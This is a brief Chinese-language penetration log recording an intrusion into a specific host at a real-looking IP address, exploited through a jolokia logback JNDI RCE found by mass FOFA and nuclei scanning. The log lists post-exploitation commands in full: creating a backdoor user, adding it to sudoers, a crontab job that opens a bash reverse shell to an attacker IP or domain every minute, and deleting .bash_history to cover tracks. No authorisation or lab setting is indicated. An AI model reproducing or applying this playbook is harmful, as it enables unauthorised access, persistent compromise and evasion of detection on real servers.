目标信息
- URL: http://82.160.25.227:9999/
- 漏洞信息:jolokia logback JNDI RCE
打点过程
-
使用fofa批量扫描springboot指纹,然后使用nuclei扫描,发现存在jolokia logback JNDI RCE。具体渗透过程参考:「Springboot」记一次jolokia logback JNDI RCE
-
获取到ROOT权限,查看
/etc/ssh/sshd_config
发现不允许ROOT直接登录;所以创建普通用户留下后门用户。//PermitRootLogin no 不允许root直接登录 cat /etc/ssh/sshd_config | grep "PermitRoot" //创建普通用户,并且设置密码 useradd sinan echo "密码" | passwd --stdin sinan
-
权限维持,将普通用户添加sudoers文件,可以直接提权。crontab定时任务可以定时反弹shell
//将普通用户添加进sudoers文件,可以普通用户直接提权 echo "sinan ALL=(ALL) ALL" >> /etc/sudoers //crontab添加定时反弹shell //知识点: bash反弹shell可以把ip换为域名,这样换VPS后IP变动也可以获取到shell crontab -e \* * * * * bash -c 'bash -i >& /dev/tcp/ip或者域名/端口 0>&1'
-
删除.bash_history,清除命令历史
rm -rf .bash_history